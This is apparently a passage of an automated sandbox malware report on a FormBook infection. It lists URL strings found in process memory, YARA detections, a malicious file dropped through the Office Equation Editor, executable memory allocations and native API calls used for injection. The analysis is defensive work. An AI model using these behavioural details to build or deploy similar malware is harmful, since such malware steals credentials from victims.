        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
        Source: 69577.exe, 00000004.00000002.2114089575.00000000059C0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2112769729.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpXm
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
        Source: explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
        Source: explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
        Source: explorer.exe, 00000006.00000000.2125582334.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com(
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A070 NtClose,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A120 NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099F40 NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099FF0 NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A06C NtClose,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A11C NtAllocateVirtualMemory,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099F3B NtCreateFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099FEA NtReadFile,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840078 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F9F0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F900 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
